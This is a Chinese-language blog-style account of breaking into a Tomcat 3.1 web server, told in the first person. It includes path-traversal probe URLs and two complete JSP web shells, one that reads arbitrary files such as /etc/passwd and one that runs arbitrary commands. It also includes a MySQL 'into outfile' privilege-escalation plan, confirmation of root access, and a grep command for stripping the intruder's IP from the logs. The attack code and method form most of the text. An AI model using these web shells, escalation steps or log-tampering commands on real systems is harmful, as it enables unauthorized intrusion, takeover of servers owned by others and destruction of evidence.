telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]
返回的結果如下:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2;JAVA 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown JAVA-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404
<h1>Error: 404</h1>
<h2>Location: /CHINANSL</h2>File Not Found<br>/CHINANSL
獲得了運行的WEBServer的名稱「Tomcat 3.1」。記得曾經發現過這個版本的漏洞,並且post到bugtrap上去過。
回憶一下,大概是通過「..」技術可以退出WEB目錄,於是:
HTTP://target:8080/../../../../%00.jsp (不行)
HTTP://target:8080/file/index.jsp (不行)
HTTP://target:8080/index.JSP (不行)
HTTP://target:8080/index.jsp%81 (不行)
HTTP://target:8080/index.js%70 (不行)
HTTP://target:8080/index.jsp%2581 (不行)
HTTP://target:8080/WEB-INF/ (不行)
看來安全狀況似乎還不錯,我們再來進行一下更深層的測試。Tomcat 3.1自帶了一個管理工具,可以查看WEB下的目錄及檔,並且可以添加coNtext。於是嘗試:
HTTP://target:8080/admin/
管理員果然沒有刪除或禁止訪問這個目錄,從安全的角度說,這點應該算是一個比較重要的失誤。
接著,點擊「VIEW ALL CONTEXT」按鈕,列出了WEB目錄下的一些檔和目錄的名稱,很快發現了一個上傳檔的組件,通過這個組件將一個JSP檔上傳到對方的WEB目錄裏:
<%@ page import="java.io.*" %>
<%
String file = request.getParameter("file");
String str = "";
FileInputStream fis = null;
DataInputStream dis = null;
try{
fis = new FileInputStream(file);
dis = new DataInputStream(fis);
while(true){
try{
str = dis.readLine();
}catch(Exception e){}
if(str == null)break;
out.print(str+"<br>");
}
}catch(IOException e){}
%>
然後執行:
HTTP://target:8080/upload/test.jsp?file=/etc/passwd
密碼出來了。接下來的過程是猜測密碼,沒有成功。不過,現在相當於有了一個SHELL,猜不出密碼可以先把IE當作SHELL環境。
再寫一個JSP檔:
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
然後把這個JSP再通過upload上傳,有SHELL了。
HTTP://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(詳細結果這裏就不列出來了)
怎麼獲得root權限呢?經過一番搜索發現系統安裝了MySQL,並且從JSP的源代碼中得到了MySQL的密碼,執行:
sqld">HTTP://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
顯示:
root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 5:54.72 /usr/local/data/mysql
系統是以root身份運行的MySQL。這時我思考了一下,既然知道了MySQL的密碼,那就可以寫一個SHELL程式,讓它創建一個表,然後將我的數據放到表中,再使用「select ... into outfile;」的辦法在系統上創建一個檔,讓用戶在執行su的時候,運行我的程式。(還記得apache.org有一次被入侵嗎?駭客就採用的這種辦法)。
之後就比較簡單了,上傳bindshell之類的程式,運行、獲得nobody的權限,使用su root時幫忙創建的setuid shell讓自己成為root。
但是,接下來已經實際操作,結果令人頗感意外:
HTTP://target:8080/upload/cmd.jsp?cmd=id
顯示:
uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
原來這個WEB SHELL本來就是ROOT!管理員的安全設置工作到底怎麼做的?
HTTP://target:8080/upload/cmd.jsp?cmd=ps+aux
果然是root身份運行的(不列出來了)
剩下的事情:
1、刪除我的telnet記錄。
2、刪除HTTP的日誌。
清除日誌我使用的辦法是:cat xxx |grep -V "IP" >>temp然後在把temp覆蓋那些被我修改過的日誌檔。
全站熱搜
留言列表
